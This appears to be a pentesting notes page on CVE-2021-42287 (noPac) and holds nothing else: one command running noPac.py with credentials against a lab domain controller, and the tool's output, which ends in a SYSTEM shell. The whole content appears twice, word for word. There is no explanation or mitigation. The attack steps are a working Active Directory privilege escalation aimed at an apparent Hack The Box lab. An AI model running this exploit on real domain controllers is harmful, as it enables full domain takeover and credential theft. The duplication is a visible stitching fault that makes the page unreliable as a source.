CVE-2021-42287

python3 noPac.py windcorp.htb/localadmin:Secret123 -dc-ip 172.21.96.1 -dc-host earth -shell --impersonate Administrator

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target EARTH.windcorp.htb
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-3CI2AMTZI6D$"
[*] MachineAccount "WIN-3CI2AMTZI6D$" password = DEUT6Hq!kwBw
[*] Successfully added machine account WIN-3CI2AMTZI6D$ with password DEUT6Hq!kwBw.
[*] WIN-3CI2AMTZI6D$ object = CN=WIN-3CI2AMTZI6D,CN=Computers,DC=windcorp,DC=htb
[*] WIN-3CI2AMTZI6D$ sAMAccountName == EARTH
[*] Saving a DC's ticket in EARTH.ccache
[*] Reseting the machine account to WIN-3CI2AMTZI6D$
[*] Restored WIN-3CI2AMTZI6D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_EARTH.windcorp.htb.ccache
[*] Attempting to del a computer with the name: WIN-3CI2AMTZI6D$
[-] Delete computer WIN-3CI2AMTZI6D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

PreviousCVE-2019-1414 NextCVE-2021-44228

Last updated 1 year ago

CVE-2021-42287

python3 noPac.py windcorp.htb/localadmin:Secret123 -dc-ip 172.21.96.1 -dc-host earth -shell --impersonate Administrator

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target EARTH.windcorp.htb
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-3CI2AMTZI6D$"
[*] MachineAccount "WIN-3CI2AMTZI6D$" password = DEUT6Hq!kwBw
[*] Successfully added machine account WIN-3CI2AMTZI6D$ with password DEUT6Hq!kwBw.
[*] WIN-3CI2AMTZI6D$ object = CN=WIN-3CI2AMTZI6D,CN=Computers,DC=windcorp,DC=htb
[*] WIN-3CI2AMTZI6D$ sAMAccountName == EARTH
[*] Saving a DC's ticket in EARTH.ccache
[*] Reseting the machine account to WIN-3CI2AMTZI6D$
[*] Restored WIN-3CI2AMTZI6D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_EARTH.windcorp.htb.ccache
[*] Attempting to del a computer with the name: WIN-3CI2AMTZI6D$
[-] Delete computer WIN-3CI2AMTZI6D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

PreviousCVE-2019-1414 NextCVE-2021-44228

Last updated 1 year ago